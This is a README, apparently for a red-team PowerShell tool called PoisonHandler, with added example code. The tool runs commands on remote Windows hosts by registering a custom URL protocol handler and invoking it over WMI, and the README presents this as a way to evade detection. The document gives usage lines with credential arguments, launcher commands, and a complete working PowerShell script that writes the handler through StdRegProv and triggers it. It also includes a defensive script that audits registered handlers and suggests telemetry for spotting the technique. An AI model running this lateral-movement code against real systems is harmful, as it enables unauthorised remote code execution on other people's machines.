PowerShell
Mr-Un1k0d3r

Description

lateral movement techniques that can be used during red team exercises


PoisonHandler

lateral movement techniques that can be used during red team exercises.

Execute-PoisonHandler.ps1

This technique registers a custom protocol handler on the remote host and then invokes it to execute arbitrary code there. The idea is simply to run

start handler://

to execute commands and evade detection.

This cmdlet creates a protocol handler that will call your payload, then executes it over WMI using explorer.exe.

The command that will be executed looks like the following:

cmd.exe /c start ms-browser://

Where ms-browser is the custom handler you registered; it will execute the payload you specified.

The default handler name is ms-browser, but it can be set with the -Handler switch.

The handler can also be executed through rundll32 using the following command (the handler name is appended automatically):

rundll32 url.dll,FileProtocolHandler
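The registration and trigger described above, as an added example in PowerShell. This is not the PoisonHandler project's code: it registers the handler through the WMI registry provider (StdRegProv) over a CIM session and fires it with the same "cmd.exe /c start <handler>://" line the README shows, using Win32_Process.Create. The parameter names, the Set-RemoteRegString helper and the choice of CIM/WinRM transport are this example's own assumptions; it assumes local admin on the target.

```powershell
# Added example (not PoisonHandler code): register a custom URL protocol handler
# on a remote host via StdRegProv, then invoke it with "cmd.exe /c start <handler>://".
# Assumptions: caller is local admin on the target, WinRM is reachable, and
# $Payload is the command the handler should run.
param(
    [Parameter(Mandatory)] [string] $ComputerName,
    [Parameter(Mandatory)] [string] $Payload,
    [string] $Handler = 'ms-browser',   # default handler name used by the README
    [System.Management.Automation.PSCredential] $Credential
)

# HKEY_CLASSES_ROOT as the StdRegProv hive constant (0x80000000).
$HKCR = [uint32]2147483648

$sessionArgs = @{ ComputerName = $ComputerName }
if ($Credential) { $sessionArgs.Credential = $Credential }
# New-CimSession uses WinRM by default; for the classic DCOM/WMI path add
#   -SessionOption (New-CimSessionOption -Protocol Dcom)
$cim = New-CimSession @sessionArgs

function Set-RemoteRegString {
    param([string] $SubKey, [string] $Name, [string] $Value)
    # CreateKey is idempotent; SetStringValue with an empty name sets "(Default)".
    $null = Invoke-CimMethod -CimSession $cim -Namespace root/default -ClassName StdRegProv `
        -MethodName CreateKey -Arguments @{ hDefKey = $HKCR; sSubKeyName = $SubKey }
    $r = Invoke-CimMethod -CimSession $cim -Namespace root/default -ClassName StdRegProv `
        -MethodName SetStringValue `
        -Arguments @{ hDefKey = $HKCR; sSubKeyName = $SubKey; sValueName = $Name; sValue = $Value }
    if ($r.ReturnValue -ne 0) { throw "SetStringValue on $SubKey failed: $($r.ReturnValue)" }
}

try {
    # A URL protocol needs: (Default)="URL:<name>", an empty "URL Protocol" value,
    # and shell\open\command\(Default) naming what to run. ShellExecute substitutes
    # the URL for %1, so a trailing "rem %1" swallows it instead of passing it on.
    Set-RemoteRegString -SubKey $Handler -Name '' -Value "URL:$Handler"
    Set-RemoteRegString -SubKey $Handler -Name 'URL Protocol' -Value ''
    Set-RemoteRegString -SubKey "$Handler\shell\open\command" -Name '' -Value "cmd.exe /c $Payload & rem %1"

    # Trigger: the same command line the README describes.
    $proc = Invoke-CimMethod -CimSession $cim -ClassName Win32_Process -MethodName Create `
        -Arguments @{ CommandLine = "cmd.exe /c start $Handler://" }
    if ($proc.ReturnValue -ne 0) { throw "Win32_Process.Create failed: $($proc.ReturnValue)" }
    "Handler $Handler registered and invoked on $ComputerName (pid $($proc.ProcessId))"
}
finally {
    Remove-CimSession $cim
}
```

Invoke-CimMethod takes its arguments as a hashtable, which sidesteps the Invoke-WmiMethod gotcha of having to pass StdRegProv arguments in alphabetical parameter order. Nothing here cleans the handler up afterwards; the key stays under HKCR until it is deleted, which is exactly the artifact a defender should look for.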
Usage:

Import-Module .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run"

Import-Module .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Handler ms-handler-name

Import-Module .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Username MrUn1k0d3r -Password Password

Import-Module .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Username MrUn1k0d3r -Password Password -UseRunDLL32 True

Import-Module .\Execute-PoisonHandler.ps1; Execute-PoisonHandler -ComputerName host -Payload "command to run" -Username MrUn1k0d3r -Password Password -RemoteCommand "custom command to run the handler"

The -RemoteCommand switch can be used to specify the command run on the remote host to launch the handler; the handler name will be appended to it automatically.

Commands that can be used:

  • rundll32 url.dll,FileProtocolHandler
  • rundll32 url.dll,OpenURL
  • explorer
  • start
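Every launcher in the list above resolves the scheme through the same registry data, so the durable artifact of this technique is the handler key itself. As an added example (not part of PoisonHandler), the following PowerShell enumerates URL protocol handlers in the machine-wide and per-user Classes hives of a host and flags open commands that hand the URL to an interpreter. The function name and the interpreter list are this example's own heuristic; remote use assumes the Remote Registry service is running on the target.

```powershell
# Added example (not PoisonHandler code): audit registered URL protocol handlers
# and flag those whose shell\open\command launches an interpreter.
function Get-UrlProtocolHandler {
    param([string] $ComputerName = $env:COMPUTERNAME)

    # HKCR is a merged view of these two locations. HKCR itself cannot be opened
    # remotely, but HKLM and HKU can through the Remote Registry service.
    $roots = @(
        @{ Hive = [Microsoft.Win32.RegistryHive]::LocalMachine; Path = 'SOFTWARE\Classes' }
    )
    $users = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey([Microsoft.Win32.RegistryHive]::Users, $ComputerName)
    foreach ($sid in $users.GetSubKeyNames()) {
        $roots += @{ Hive = [Microsoft.Win32.RegistryHive]::Users; Path = "$sid\Software\Classes" }
    }
    $users.Close()

    foreach ($root in $roots) {
        $base = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey($root.Hive, $ComputerName)
        $classes = $base.OpenSubKey($root.Path)
        if ($null -eq $classes) { $base.Close(); continue }
        foreach ($scheme in $classes.GetSubKeyNames()) {
            $key = $classes.OpenSubKey($scheme)
            if ($null -eq $key) { continue }
            # Only keys carrying the "URL Protocol" marker are schemes ShellExecute honours.
            if ($null -ne $key.GetValue('URL Protocol')) {
                $cmdKey  = $key.OpenSubKey('shell\open\command')
                $command = if ($cmdKey) { [string]$cmdKey.GetValue('') } else { '' }
                [pscustomobject]@{
                    Computer   = $ComputerName
                    Hive       = "$($root.Hive)\$($root.Path)"
                    Scheme     = $scheme
                    Command    = $command
                    # Heuristic (assumption): a scheme that resolves to a shell or
                    # script host is worth a second look; benign apps register their own exe.
                    Suspicious = [bool]($command -match '\b(cmd|powershell|pwsh|rundll32|mshta|wscript|cscript|regsvr32)(\.exe)?\b')
                }
                if ($cmdKey) { $cmdKey.Close() }
            }
            $key.Close()
        }
        $classes.Close(); $base.Close()
    }
}

# Usage: list handlers on this host that hand the URL to an interpreter.
Get-UrlProtocolHandler | Where-Object Suspicious | Format-Table Scheme, Command, Hive -AutoSize
```

Pair the audit with registry auditing on HKLM\SOFTWARE\Classes (event ID 4657 on value changes) and with process-creation telemetry for cmd.exe, explorer.exe or rundll32.exe command lines containing "start <scheme>://" or "url.dll,FileProtocolHandler", since the launch itself is the other half of the behaviour this tool relies on.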

To do

  • add more ways to execute the protocol handler

Credit

Mr.Un1k0d3r RingZer0 Team

Tazz0 RingZer0 Team
